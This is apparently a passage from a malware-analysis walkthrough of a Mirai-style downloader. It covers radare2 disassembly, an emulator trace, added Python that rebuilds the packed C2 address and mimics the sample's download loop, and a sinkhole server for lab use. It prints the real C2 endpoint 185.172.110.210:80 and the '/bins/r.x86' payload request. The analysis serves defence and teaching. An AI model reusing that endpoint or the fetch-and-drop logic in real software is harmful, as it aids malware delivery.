│           0x080480d4      c1e908         shr ecx, 8
│           0x080480d7      09ca           or edx, ecx
│           0x080480d9      09d0           or eax, edx
╰           0x080480db      c3             ret

Reading it in two halves: up to pop ebp it packs the four byte-sized arguments into a single 32-bit value a<<24 | b<<16 | c<<8 | d, and the remainder swaps the byte order of that value (a ends up in the low byte, d in the high byte). Stored in memory on a little-endian machine, that is the IPv4 address a.b.c.d in network byte order, i.e. what inet_addr("a.b.c.d") returns. In entry0 it is called with the constants pushed in the order 0xd2, 0x6e, 0xac, 0xb9 (file offsets 0x1cc-0x1e8 in the hexdump), so the arguments left to right are 0xb9, 0xac, 0x6e, 0xd2 and it builds 185.172.110.210. The result is stored at ebp-0x1c, right after the sin_family = 2 and sin_port = 0x5000 (port 80) words written at ebp-0x20 and ebp-0x1e: it fills in the sin_addr field of the sockaddr_in that connect() later receives. Rename it accordingly:

[0x08048094]> afn fcn.packIP_08048094 0x08048094
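As an added example (not from the original post), here is the same computation in Python, written step by step in the order the disassembly does it, together with the sockaddr_in that entry0 assembles around the result. The byte values and the port are the ones the sample pushes; everything else (function names, the zeroed padding, the decoder) is this example's own.

```python
import socket
import struct

MASK32 = 0xFFFFFFFF


def pack_ip(a, b, c, d):
    """Mirror of fcn.08048094.

    First half (up to pop ebp): edx = a<<24 | b<<16, ecx = c<<8, ecx |= edx | d,
    i.e. a.b.c.d as one 32-bit number held in a register.
    Second half: byte-swap that number. Written little-endian to memory the
    result is a.b.c.d in network byte order, which is what inet_addr() returns.
    """
    edx = ((a & 0xFF) << 24) | ((b & 0xFF) << 16)
    ecx = ((c & 0xFF) << 8) | edx | (d & 0xFF)
    eax = ((ecx << 24) & MASK32) | ((ecx & 0xFF00) << 8)   # low two bytes move up
    edx = (ecx >> 24) | ((ecx & 0xFF0000) >> 8)           # high two bytes move down
    return eax | edx


def matches_inet_aton(a, b, c, d):
    """Sanity check: the packed value, stored in memory, equals inet_aton('a.b.c.d')."""
    return struct.pack("<I", pack_ip(a, b, c, d)) == socket.inet_aton("%d.%d.%d.%d" % (a, b, c, d))


def build_sockaddr_in(a, b, c, d, port):
    """The 16-byte sockaddr_in entry0 builds on its stack at ebp-0x20:
    sin_family = 2 (AF_INET), sin_port in network order (0x5000 for port 80),
    sin_addr from pack_ip, then 8 bytes of padding (zeroed here; connect()
    ignores them for AF_INET)."""
    return (struct.pack("<H", socket.AF_INET) + struct.pack(">H", port)
            + struct.pack("<I", pack_ip(a, b, c, d)) + b"\x00" * 8)


def describe_sockaddr(raw):
    """Decode such a struct back into 'ip:port', which is what connect() sees."""
    family = struct.unpack("<H", raw[0:2])[0]
    port = struct.unpack(">H", raw[2:4])[0]
    if family != socket.AF_INET:
        raise ValueError("not an AF_INET sockaddr")
    return "%s:%d" % (socket.inet_ntoa(raw[4:8]), port)


if __name__ == "__main__":
    # The constants entry0 pushes (0xb9, 0xac, 0x6e, 0xd2) and the port word it stores.
    sa = build_sockaddr_in(0xB9, 0xAC, 0x6E, 0xD2, 80)
    print(sa.hex(), "->", describe_sockaddr(sa))
```

Because the address is assembled from four immediates rather than stored as a string, a strings-based IoC extraction misses the C2 entirely; a rule that looks for this pack-and-swap sequence, or an emulator run as shown further down, is what recovers it.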

With every function named we can render the call graph as an image, but first we need it in dot format; check the ag? help message for the graph commands:

[0x08048330]> s entry0 
[0x08048324]> agcd > callgraph.dot

Check the file:

$ cat callgraph.dot
digraph code {
rankdir=LR;
outputorder=edgesfirst;
graph [bgcolor=azure fontname="Courier" splines="curved"];
node [penwidth=4 fillcolor=white style=filled fontname="Courier Bold" fontsize=14 shape=box];
edge [arrowhead="normal" style=bold weight=2];
  "0x08048324" [label="entry0" URL="entry0/0x08048324"];
  "0x08048324" -> "0x08048142" [color="#61afef" URL="fcn.write_08048142/0x08048142"];
  "0x08048142" [label="fcn.write_08048142" URL="fcn.write_08048142/0x08048142"];
  "0x08048324" -> "0x08048094" [color="#61afef" URL="fcn.packIP_08048094/0x08048094"];
  "0x08048094" [label="fcn.packIP_08048094" URL="fcn.packIP_08048094/0x08048094"];
  "0x08048324" -> "0x08048103" [color="#61afef" URL="fcn.open_08048103/0x08048103"];
  "0x08048103" [label="fcn.open_08048103" URL="fcn.open_08048103/0x08048103"];
  "0x08048324" -> "0x08048172" [color="#61afef" URL="fcn.socketcall_scocket_08048172/0x08048172"];
  "0x08048172" [label="fcn.socketcall_scocket_08048172" URL="fcn.socketcall_scocket_08048172/0x08048172"];
  "0x08048324" -> "0x080480dc" [color="#61afef" URL="fcn.exit_080480dc/0x080480dc"];
  "0x080480dc" [label="fcn.exit_080480dc" URL="fcn.exit_080480dc/0x080480dc"];
  "0x08048324" -> "0x0804811b" [color="#61afef" URL="fcn.socketcall_connect_0804811b/0x0804811b"];
  "0x0804811b" [label="fcn.socketcall_connect_0804811b" URL="fcn.socketcall_connect_0804811b/0x0804811b"];
  "0x08048324" -> "0x0804815a" [color="#61afef" URL="fcn.read_0804815a/0x0804815a"];
  "0x0804815a" [label="fcn.read_0804815a" URL="fcn.read_0804815a/0x0804815a"];
  "0x08048324" -> "0x080480f1" [color="#61afef" URL="fcn.close_080480f1/0x080480f1"];
  "0x080480f1" [label="fcn.close_080480f1" URL="fcn.close_080480f1/0x080480f1"];
}

And convert it:

dot -Tpng callgraph.dot > callgraph.png

Callgraph

Good. The picture confirms that all of these functions are called from entry0.

Now that we know what all these functions do, we can run the sample under an emulator. We can use zelos for that. Install it and run the sample:

$ zelos 1180
Plugins: trace, overlay, runner, syscalllimiter, yarascan
22:41:48:hooks_____:INFO__:Reached entrypoint 0x8048324
[StdOut]: 'b'TF''
[main] [SYSCALL] write ( fd=0x1 (stdout), buf=0x8048381 ("TF"), count=0x2 ) -> 2
[main] [SYSCALL] open ( pathname=0x8048385 ("Dawd2AD"), flags=0x241 ) -> 10
[main] [SOCKET SYSCALL] [08048352] socket ( domain=0x2 (INET), type=0x1, protocol=0x0 )
[main] [SYSCALL] socketcall ( domain=0x2 (INET), type=0x1, protocol=0x0 ) -> 14
[main] [SOCKET SYSCALL] [08048352] connect ( sockfd=0x14 (AF_INET:SOCK_STREAM:?:?), dest_addr=0xff08ee8c (185.172.110.210:80), addrlen=0x10 )
[main] [SYSCALL] socketcall ( sockfd=0x14 (AF_INET:SOCK_STREAM:?:?), dest_addr=0xff08ee8c (185.172.110.210:80), addrlen=0x10 ) -> 0
[HIGHLIGHTS] [main]: File written: File name: SocketHandle, sock#000, Wrote 35 bytes
[main] [SYSCALL] write ( fd=0x14 (socket), buf=0x8048392 ("GET /bins/r.x86 HTTP/1.0\r\n\r\n\x00INT\n\x00\x00"), count=0x23 ) -> 23
received: 'b'0''
[main] [SYSCALL] read ( fd=0x14 (socket), buf=0xff08ee9f, count=0x1 ) -> 1
received: 'b'0''
[main] [SYSCALL] read ( fd=0x14 (socket), buf=0xff08ee9f, count=0x1 ) -> 1
received: 'b'0''
...
received: 'b'0''
22:41:48:syscall_li:INFO__:Syscall read called 50 times. No longer printing syscalls
^C...
KeyboardInterrupt
22:41:50:syscall_li:INFO__:Syscall printing reenabled
[main] [SYSCALL] exit ( status=0x4 ) -> void
22:41:50:threads___:ERROR_:Thread main failed: syscall Exit_Group status 4

From the trace we can see the whole flow: the sample writes "TF" to stdout, opens the file Dawd2AD with flags 0x241 (O_WRONLY|O_CREAT|O_TRUNC), connects to 185.172.110.210 on TCP port 80, sends GET /bins/r.x86, and then reads the reply one byte at a time looking for the end of the HTTP headers (the 0d0a0d0a compare at file offset 0x2bb). Under the emulator no real response arrives, so the read loop spins until we interrupt it and the program exits with status 4, the error path of that loop. The rest of entry0 (file offsets 0x2c3-0x31f in the hexdump) shows what would happen against a real server: after the header terminator it reads the body in 0x80-byte chunks and writes each one to the Dawd2AD descriptor, closes both descriptors, prints "INT" and exits with status 5. In other words, this is a downloader whose only job is to fetch the real bot binary for this architecture and drop it on disk. Note also that the request is written with count 0x23 (35) although the string is only 28 bytes long, so the bytes that follow it in .rodata ("\0INT\n\0\0") go on the wire too. What can we do with all that information?
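One thing we can do is stand in for the server. Here is an added Python sinkhole for this downloader; it is not part of the original post. serve_once is a one-shot HTTP/1.0 server that records the request it receives and answers with a payload of our choosing, and fetch_like_sample mimics the sample's own receive loop (one byte at a time until the 0d0a0d0a terminator, then 0x80-byte reads until EOF) so the pair can be exercised offline. The payload and the loopback address are constructed for the example; in the lab you would bind the server to the C2 address inside an isolated network, feed it a benign file, and check that Dawd2AD ends up containing exactly what you served.

```python
import socket
import threading

REQUEST = b"GET /bins/r.x86 HTTP/1.0\r\n\r\n"   # the sample's request string (.rodata 0x8048392)
HEADER_END = 0x0D0A0D0A                        # the constant entry0 compares its 4-byte window against


def serve_once(payload, host="127.0.0.1", port=0):
    """Fake C2 in a background thread: accept one client, record what it sent,
    answer with a minimal HTTP/1.0 response carrying `payload`, then close.
    Returns ((host, port), thread, seen) where seen fills in after the request."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    seen = {}

    def run():
        conn, peer = srv.accept()
        with conn:
            req = b""
            # The real sample writes 35 bytes (request plus trailing junk), so
            # stop on the header terminator rather than on an exact length.
            while b"\r\n\r\n" not in req and len(req) < 4096:
                chunk = conn.recv(1024)
                if not chunk:
                    break
                req += chunk
            seen["peer"], seen["request"] = peer, req
            head = b"HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n" % len(payload)
            conn.sendall(head + payload)      # closing the socket gives the client its EOF
        srv.close()

    thread = threading.Thread(target=run, daemon=True)
    thread.start()
    return srv.getsockname(), thread, seen


def fetch_like_sample(addr, chunk_size=0x80):
    """Reproduce the downloader's receive loop from entry0 and return the body
    (the bytes the sample would write into Dawd2AD)."""
    with socket.create_connection(addr) as s:
        s.sendall(REQUEST)
        window = 0
        while window != HEADER_END:
            b = s.recv(1)
            if len(b) != 1:                   # the sample calls exit(4) here
                raise ConnectionError("peer closed before end of headers")
            window = ((window << 8) | b[0]) & 0xFFFFFFFF
        body = b""
        while True:                           # read(sock, buf, 0x80) until it returns <= 0
            chunk = s.recv(chunk_size)
            if not chunk:
                break
            body += chunk
    return body


if __name__ == "__main__":
    fake_payload = b"\x7fELF-constructed-fake-payload-" * 8   # constructed, not a real binary
    addr, thread, seen = serve_once(fake_payload)
    body = fetch_like_sample(addr)
    thread.join(5)
    print("request:", seen["request"])
    print("body matches:", body == fake_payload, "(%d bytes)" % len(body))
```

The server ignores the request path on purpose: a downloader variant that asks for a different /bins/ name still gets a response, and the recorded request tells you which name it used.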


https://github.com/radareorg/radare2/blob/master/doc/intro.md

One option is to give the C2 address to a container of our own, so the sample can be run against a server we control:

:~/MALWARE/CASE_001 ~ docker network create --subnet=185.172.0.0/16 mirai
8596541d6184ebd4288e73031a07200b5c178135e957109d273312a84bae3b77

:~/MALWARE/CASE_001 ~ docker run --net mirai --ip 185.172.110.210 -it ubuntu bash